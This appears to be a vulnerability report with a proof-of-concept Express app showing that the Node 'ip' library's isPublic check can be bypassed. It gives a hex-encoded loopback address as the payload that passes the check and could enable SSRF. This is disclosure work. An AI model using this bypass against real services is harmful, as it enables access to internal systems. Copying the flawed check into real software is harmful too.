ip library possible ssrf vulnerability (similar to CVE-2023-42282)

const express = require('express')
const ip = require('ip')
const app = express()

// WARNING: This is a demonstration app for security research
// DO NOT use in production environments

app.get('/check-endpoint', (req, res) => {
    const targetIp = req.query.ip
    
    // Vulnerable check that could be bypassed
    if (ip.isPublic(targetIp)) {
        // Simulate fetching data - in a real app this could lead to SSRF
        res.json({
            message: "IP check passed",
            ip: targetIp,
            isAllowed: true
        })
    } else {
        res.status(403).json({
            message: "Access denied - private IP",
            ip: targetIp,
            isAllowed: false
        })
    }
})

// Only run on localhost for testing
app.listen(3000, 'localhost', () => {
    console.log('Test environment running on http://localhost:3000')
})

In this code, you can test it via two GET Requests like:

Valid request with public ip:

http://localhost:3000/check-endpoint?ip=2.2.2.2

Invalid request with private ip:

http://localhost:3000/check-endpoint?ip=127.0.0.1

Because of the incomplete/insufficient regex code on the library i can able to bypass it via this:

0x0000007f.0x00000000.0x00000000.0x00000001

so if you send the request like:

http://localhost:3000/check-endpoint?ip=0x0000007f.0x00000000.0x00000000.0x00000001

You can see that ip library take this as a public ip and it can lead to SSRF.

divinepwner/index.md

Select an option

No results found

Select an option

No results found